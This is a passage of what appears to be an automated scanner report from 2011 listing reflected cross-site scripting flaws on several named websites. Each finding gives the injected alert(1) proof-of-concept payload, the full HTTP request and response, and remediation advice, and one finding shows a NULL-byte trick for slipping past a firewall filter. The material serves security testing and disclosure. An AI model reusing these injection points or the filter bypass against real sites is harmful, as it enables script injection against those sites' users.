The value of the c request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00412f4'-alert(1)-'956e390f61d was submitted in the c parameter. This input was echoed as 412f4'-alert(1)-'956e390f61d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=2011 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:41:39 GMT
Server: Microsoft-IIS/6.0
Server: Summit
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 427 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Wed, 02 Feb 2011 15:51:38 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 212188
<!-- An exception occurred. Described as: Incorrect syntax near '412'. The floating point value '956e390' is out of the range of computer representation (8 bytes).--><!DOCTYPE html PUBLIC "-//
...[SNIP]...
<!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4%00412f4'-alert(1)-'956e390f61d&pid=88&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //-->
...[SNIP]...
1.164. http://recruiting.scout.com/a.z [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://recruiting.scout.com
Path: /a.z
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 21eb1'-alert(1)-'67613be4156 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a.z?s=73&p=9&c=4&pid=88&yr=2011&21eb1'-alert(1)-'67613be4156=1 HTTP/1.1
Host: recruiting.scout.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Connection: close
Date: Wed, 02 Feb 2011 15:42:45 GMT
Server: Microsoft-IIS/6.0
Server: Scoutweb1
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
X-HTTPModule: Scout Media Excalibur v.6.24.1.5335
X-Streamed: from 192.168.20.181 in 367 ms
Set-Cookie: RefId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: BrandId=0; domain=.scout.com; expires=Fri, 01-Jan-2038 08:00:00 GMT; path=/
Set-Cookie: SessionBrandId=0; domain=.scout.com; path=/
Cache-Control: public, s-maxage=600
Expires: Wed, 02 Feb 2011 15:52:44 GMT
Content-Type: text/html; charset=utf-8
Content-Length: 211233
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html> <head> <title>Scout.com: Football Recruiting</title> <meta http-eq
...[SNIP]...
<!-- function SeasonYearChange() { document.location.href='/a.z?s=73&p=9&c=4&pid=88&21eb1'-alert(1)-'67613be4156=1&yr=' + $("#yr").get(0)[$("#yr").get(0).selectedIndex].value;} //-->
...[SNIP]...
The value of the frameName request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 46054'-alert(1)-'3516148de48 was submitted in the frameName parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the pageURL request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8e7a8'-alert(1)-'8af0a80e42e was submitted in the pageURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the ranreq request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b0ddb'-alert(1)-'75dd4dca154 was submitted in the ranreq parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the lang request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7b5be"><script>alert(1)</script>51b0587d24d was submitted in the lang parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en7b5be"><script>alert(1)</script>51b0587d24d&url=refpage&title=refpage&tag=refpage&text=refpage">
...[SNIP]...
1.169. http://sociallist.org/submit.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://sociallist.org
Path: /submit.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c92e7"><script>alert(1)</script>c161344b8ce was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1 HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:39 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 18868
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?c92e7"><script>alert(1)</script>c161344b8ce=1">
...[SNIP]...
The value of the tag request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 94680"><script>alert(1)</script>385c4aafbf was submitted in the tag parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19488
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage94680"><script>alert(1)</script>385c4aafbf&text=refpage">
...[SNIP]...
The value of the text request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5bf26"><script>alert(1)</script>4d8458ad73a was submitted in the text parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage5bf26"><script>alert(1)</script>4d8458ad73a">
...[SNIP]...
The value of the title request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f5df9"><script>alert(1)</script>6ca859d5791 was submitted in the title parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpage&title=refpagef5df9"><script>alert(1)</script>6ca859d5791&tag=refpage&text=refpage">
...[SNIP]...
The value of the type request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fae34"><script>alert(1)</script>c10119c2686 was submitted in the type parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:42 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1fae34"><script>alert(1)</script>c10119c2686&lang=en&url=refpage&title=refpage&tag=refpage&text=refpage">
...[SNIP]...
The value of the url request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a978a"><script>alert(1)</script>2b441ed7164 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage HTTP/1.1
Host: sociallist.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Response
HTTP/1.1 200 OK
Server: nginx/0.9.1
Date: Tue, 01 Feb 2011 14:32:44 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.14
Content-Length: 19498
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="content-type" content
...[SNIP]...
<a href="http://sociallist.org/submit.php?type=1&lang=en&url=refpagea978a"><script>alert(1)</script>2b441ed7164&title=refpage&tag=refpage&text=refpage">
...[SNIP]...
The value of the ROIID request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e5d61'%3balert(1)//83d5529551f was submitted in the ROIID parameter. This input was echoed as e5d61';alert(1)//83d5529551f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /track/track.aspx?ROIID=936138107000019e5d61'%3balert(1)//83d5529551f HTTP/1.1
Host: track.roiservice.com
Proxy-Connection: keep-alive
Referer: http://www.millenniumhotels.com/millenniumboston/index.html
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: msid938956107000029=06dd214c75b14fd39004a5e41502868d
Response
HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 15:42:42 GMT
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP NID PSA ADM OUR IND NAV COM"
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: msid936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; expires=Sun, 02-Feb-2031 15:42:42 GMT; path=/
Set-Cookie: GTT936138107000019e5d61';alert(1)//83d5529551f=ddc990c0fc744d2cbe0ff4ded6312952; domain=.roiservice.com; path=/
Cache-Control: private
Content-Type: text/javascript; charset=utf-8
Content-Length: 1656
1.176. http://wp-superslider.com/ [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://wp-superslider.com
Path: /
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ce46"><script>alert(1)</script>2b12960bb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2ce46\"><script>alert(1)</script>2b12960bb2 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /?2ce46"><script>alert(1)</script>2b12960bb2=1 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ba1c7"><script>alert(1)</script>59b95746b00 was submitted in the REST URL parameter 1. This input was echoed as ba1c7\"><script>alert(1)</script>59b95746b00 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /index.phpba1c7"><script>alert(1)</script>59b95746b00 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:47 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674627+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674628; expires=Thu, 02-Feb-2012 19:23:48 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:48 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53197
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 427c3"><script>alert(1)</script>6ae2ba26414 was submitted in the REST URL parameter 1. This input was echoed as 427c3\"><script>alert(1)</script>6ae2ba26414 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site427c3"><script>alert(1)</script>6ae2ba26414/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:02 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674583+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674583; expires=Thu, 02-Feb-2012 19:23:03 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:03 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b5400"><script>alert(1)</script>18ede8274ac was submitted in the REST URL parameter 2. This input was echoed as b5400\"><script>alert(1)</script>18ede8274ac in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-contentb5400"><script>alert(1)</script>18ede8274ac/plugins/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:04 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674584+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674585; expires=Thu, 02-Feb-2012 19:23:05 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:05 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 29535"><script>alert(1)</script>bb1a33e1d72 was submitted in the REST URL parameter 3. This input was echoed as 29535\"><script>alert(1)</script>bb1a33e1d72 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins29535"><script>alert(1)</script>bb1a33e1d72/si-contact-form/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:06 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674586+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674587; expires=Thu, 02-Feb-2012 19:23:07 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:07 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcc9c"><script>alert(1)</script>406f3f1b80a was submitted in the REST URL parameter 4. This input was echoed as fcc9c\"><script>alert(1)</script>406f3f1b80a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-formfcc9c"><script>alert(1)</script>406f3f1b80a/captcha-secureimage/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:08 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674588+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674588; expires=Thu, 02-Feb-2012 19:23:08 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:08 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53392

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21998"><script>alert(1)</script>61808997102 was submitted in the REST URL parameter 5. This input was echoed as 21998\"><script>alert(1)</script>61808997102 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-form/captcha-secureimage21998"><script>alert(1)</script>61808997102/ctf_captcha.js HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found
Date: Wed, 02 Feb 2011 19:23:09 GMT
Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
X-Powered-By: PHP/5.2.12
X-Pingback: http://wp-superslider.com/site/xmlrpc.php
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
Pragma: no-cache
Set-Cookie: bb2_screener_=1296674589+173.193.214.243; path=/
Set-Cookie: wpgb_visit_last_php-default=1296674590; expires=Thu, 02-Feb-2012 19:23:10 GMT; path=/
Last-Modified: Wed, 02 Feb 2011 19:23:10 GMT
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53391

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be147"><script>alert(1)</script>60a126f5ab0 was submitted in the REST URL parameter 6. This input was echoed as be147\"><script>alert(1)</script>60a126f5ab0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/si-contact-form/captcha-secureimage/ctf_captcha.jsbe147"><script>alert(1)</script>60a126f5ab0 HTTP/1.1
Host: wp-superslider.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
